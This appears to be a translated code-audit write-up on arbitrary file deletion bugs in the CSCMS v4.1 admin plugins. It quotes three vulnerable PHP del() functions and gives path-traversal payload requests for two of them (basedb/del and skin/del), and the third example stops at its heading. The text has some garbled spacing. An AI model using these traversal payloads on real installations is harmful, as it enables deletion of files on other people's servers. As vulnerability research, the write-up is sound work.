[Code Audit] Instance of Arbitrary File Deletion Vulnerability

 

Arbitrary file deletion vulnerability, which allows an attacker to delete arbitrary files on the server at will.

 

Environment build:

CSCMS ：http://www.chshcms.com/

Website source code version: Cscms_v4.1 official version (release date: 2017-06-05)

Program source code download: https://github.com/chshcms/cscms

 

Vulnerability example one:

Vulnerability file location: \cscms\plugins\sys\admin\Basedb.php Lines 160-177:

         public function del(){

                   $dir = $this->input->get_post('id',true);

                   if(empty($dir)){

                            getjson(L( ' plum_11 ' ));

                   }

                   $dirs = array();

                   if(!is_array($dir)){

                            $ dirs [] = $ dir;

                   }else{

                            $ dirs = $ dir;

                   }

                   foreach($dirs as $dir) {

            deldir(FCPATH.'attachment/backup/'.$dir);

                   }

                   $info['msg'] = L('plub_12');

                   $info['url'] = site_url('basedb/restore').'?v='.rand(1000,9999);

        getjson($info, 0 );

         }

Exploit:

1. Create a new test directory in the root directory as a test:

 

2. The construction parameters successfully delete the test directory

http://127.0.0.1/admin.php/basedb/del

POST:id=..\\..\\test

 

Vulnerability example two:

Vulnerability file location: /plugins/sys/admin/Skin.php Line 418--440:

         public function del(){

        $ac = $this->input->get('ac',true);

        $op = $this->input->get('op',true);

        $dir = $this->input->get('dirs',true);

        $file = $this->input->get('file');

                   if($ac!='mobile') $ac='pc';

                   if($op!='home' && $op!='user') $op='skins';

                   if(empty($dir)) getjson(L('plub_27'));

 

        $ skin_dir = VIEWPATH. $ ac.FGF. $ op.FGF. $ dir.FGF. $ file;

                   if (!is_dir($skin_dir)) {  //文件

              $res=unlink($skin_dir);

                   }else{  //目录

              $res=deldir($skin_dir);

                   }

                   if($res){

            $ info [ ' url ' ] = site_url ( ' skin ' ). ' ? ac = ' . $ ac. ' & op = ' . $ op. ' & v = ' .rand ( 1000 , 9999 );

            $info['msg'] = L('plub_46');

            $info['turn'] = 1;

            getjson($info, 0 );

                   }else{

            getjson(L( ' plum_28 ' ));

                   }

Exploit:

Create a new 1.txt file in the root directory of the website as a test, construct the URL and delete the file successfully

Payload：http://127.0.0.1/admin.php/skin/del?ac=pc&op=skins&dirs=default&file=..\\..\\..\\..\\1.txt

 

Vulnerability example three:

Vulnerability file location: /plugins/sys/admin/Plugins.php Lines 285-299:

  public function del(){

             $dir = $this->input->get_post('dir',true);

             if($dir==''){

                      getjson(L('plub_del_0'),1);

             }

        deldir(FCPATH.'plugins'.FGF.$dir.FGF);

                   // delete the configuration directory

        deldir (CSCMS. $ dir.FGF);

                   // delete template directory

        deldir(FCPATH.'tpl/admin/'.$dir.FGF);

        $info['func'] = __FUNCTION__;

        $info['msg'] = L('plub_del_1');

        getjson($info,0);

         }

Exploit: